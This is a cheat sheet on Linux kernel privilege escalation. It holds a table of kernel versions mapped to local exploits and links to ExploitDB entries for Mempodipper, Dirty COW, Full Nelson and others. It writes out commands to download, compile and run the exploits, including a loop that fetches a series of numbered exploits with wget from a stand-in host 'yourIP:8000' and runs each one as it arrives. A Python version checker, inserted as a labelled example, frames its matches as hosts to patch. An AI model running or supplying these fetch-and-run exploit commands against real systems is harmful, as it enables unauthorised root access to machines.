# Kernel Exploitation

* Kernels are the core of any operating system.
* Think of it as a layer between application software and the actual computer hardware.
* The kernel has complete control over the operating system. Exploiting a kernel vulnerability can result in execution as the root user.

## Finding a kernel exploit

1. **Enumerate the kernel version: `uname -a`**
2. **Find matching exploits (Google, ExploitDB, GitHub)**
3. **Compile and run.**

Note: kernel exploits are often unstable. Many are one-shot, and a failed attempt can crash the system.

### Linux Local Exploit

Enumeration tools:

* `linux-exploit-suggester`
* `unix_privesc_check`

Kernel version ranges and the local exploits that match them:

```
kernel 2.4.x / 2.6.x (sock_sendpage 1)
kernel 2.4 / 2.6 (sock_sendpage 2)
kernel < 2.6.22 (ftruncate)
kernel < 2.6.34 (cap_sys_admin)
kernel 2.6.27 < 2.6.36 (compat)
kernel < 2.6.36-rc1 (can bcm)
kernel <= 2.6.36-rc8 (rds protocol)
kernel < 2.6.36.2 (half nelson)
kernel <= 2.6.37 (full nelson)
kernel 2.6 (udev)
kernel 3.13 (sgid)
kernel 3.13.0 < 3.19 (overlayfs 1)
kernel 3.14.5 (libfutex)
kernel 2.6.39 <= 3.2.2 (mempodipper)
kernel 2.6.28 / 3.0 (alpha-omega)
kernel 2.6.22 < 3.9 (Dirty Cow)
kernel 3.7.6 (msr)
kernel < 3.8.9 (perf_swevent_init)
kernel <= 4.3.3 (overlayfs 2)
kernel 4.3.3 (overlayfs 3)
kernel 4.4.0 (af_packet)
kernel 4.4.x (double-fdput)
kernel 4.4.0-21 (netfilter)
kernel 4.4.1 (refcount)
```
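A version check for steps 1 and 2 above, as an added example that is not part of these notes: it parses a `uname -r` string and reports which of the version ranges listed above contain it. The ranges are copied from that list (CVE numbers from the 'Other exploits' section below, None where the page gives none) and are upstream version bounds only; distro kernels backport fixes, so a hit means the host needs checking against its distro advisory, not that it is proven vulnerable.

```python
"""Check a `uname -r` string against the kernel version ranges listed above.
Added example, not part of the original notes. Ranges are copied from the
page's list and are upstream bounds only: distro kernels backport fixes, so
a hit means "confirm against the distro advisory and patch", not "vulnerable"."""
import re

# (label, cve, low_inclusive, high, high_inclusive); None = no bound given on the page
RANGES = [
    ("ftruncate",         None,            None,       (2, 6, 22), False),  # < 2.6.22
    ("cap_sys_admin",     None,            None,       (2, 6, 34), False),  # < 2.6.34
    ("mempodipper",       "CVE-2012-0056", (2, 6, 39), (3, 2, 2),  True),   # 2.6.39 <= 3.2.2
    ("dirty cow",         "CVE-2016-5195", (2, 6, 22), (3, 9),     False),  # 2.6.22 < 3.9
    ("perf_swevent_init", None,            None,       (3, 8, 9),  False),  # < 3.8.9
    ("overlayfs 1",       None,            (3, 13, 0), (3, 19),    False),  # 3.13.0 < 3.19
    ("overlayfs 2",       None,            None,       (4, 3, 3),  True),   # <= 4.3.3
]

def parse_release(release: str) -> tuple:
    """'4.4.0-21-generic' -> (4, 4, 0); '2.6.32-431.el6.x86_64' -> (2, 6, 32).
    Only the leading dotted numbers count; the distro suffix is ignored."""
    m = re.match(r"(\d+(?:\.\d+)*)", release.strip())
    if not m:
        raise ValueError(f"not a kernel release string: {release!r}")
    return tuple(int(p) for p in m.group(1).split("."))

def in_range(version: tuple, low, high: tuple, high_inclusive: bool) -> bool:
    if low is not None and version < low:        # lexicographic tuple compare
        return False
    if high_inclusive:
        return version[:len(high)] <= high       # 3.2.2.x still counts as <= 3.2.2
    return version < high                        # (3, 9, 0) < (3, 9) is False, as intended

def matching_ranges(release: str) -> list:
    """Labels of every listed range that contains this release, in list order."""
    v = parse_release(release)
    return [label for label, _, low, high, incl in RANGES if in_range(v, low, high, incl)]

def report(release: str) -> str:
    hits = matching_ranges(release)
    if not hits:
        return f"{release}: outside every range listed on this page"
    cves = sorted({c for label, c, *_ in RANGES if label in hits and c})
    return f"{release}: in range for {', '.join(hits)}; CVEs on page: {', '.join(cves) or 'none'}"

if __name__ == "__main__":
    import subprocess
    # Constructed sample releases, then the running host's own uname -r.
    for rel in ["2.6.32-431.el6.x86_64", "3.13.0-24-generic", "4.4.0-21-generic"]:
        print(report(rel))
    print(report(subprocess.run(["uname", "-r"], capture_output=True, text=True).stdout))
```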

### Other exploits

* Linux Kernel 2.6.39 - 3.2.2 (Gentoo / Ubuntu x86/x64) - 'Mempodipper' Local Privilege Escalation:
  * <https://www.exploit-db.com/exploits/18411/>
  * <https://www.securityfocus.com/bid/51625/info>
  * CVE-2012-0056
* Linux Kernel 2.6.22 - 3.9 (x86/x64) - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (SUID Method):
  * <https://www.exploit-db.com/exploits/40616/>
  * CVE-2016-5195
* Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation
  * <https://www.exploit-db.com/exploits/3/>
  * <http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c>
  * CVE-2003-0127
* Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) UDEV below 1.4.1 - Local Privilege Escalation (1)
  * <https://www.exploit-db.com/exploits/8478/>
  * `exploit/linux/local/udev_netlink` (Metasploit module)

### Exploits worth running

* Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation

```
https://www.exploit-db.com/exploits/37292
```

* CVE-2010-3904 - Linux RDS Exploit - Linux Kernel <= 2.6.36-rc8

```
https://www.exploit-db.com/exploits/15285/
```

* Linux Kernel <= 2.6.37 'Full-Nelson.c'

```
https://www.exploit-db.com/exploits/15704/
```

* CVE-2012-0056 - Mempodipper - Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64)

```
https://git.zx2c4.com/CVE-2012-0056/about/
```

* Linux CVE-2012-0056 (Mempodipper): download, compile and run

```
wget -O exploit.c http://www.exploit-db.com/download/18411

gcc -o mempodipper exploit.c

./mempodipper
```

* CVE-2016-5195 - Dirty Cow - Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8

```
https://dirtycow.ninja/
```

* Compile Dirty COW (the `40847.cpp` variant):

```
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
```

* Cross-compiling exploits (match the target's architecture, as shown by `uname -m`):

```
gcc -m32 -o output32 hello.c   # 32-bit
gcc -m64 -o output hello.c     # 64-bit
```

* Linux 2.6.32

```
https://www.exploit-db.com/exploits/15285/
```

* Elevation in 2.6.x:

```
for a in 9352 9513 33321 15774 15150 15944 9543 33322 9545 25288 40838 40616 40611 ; do wget http://yourIP:8000/$a; chmod +x $a; ./$a; id; done
```
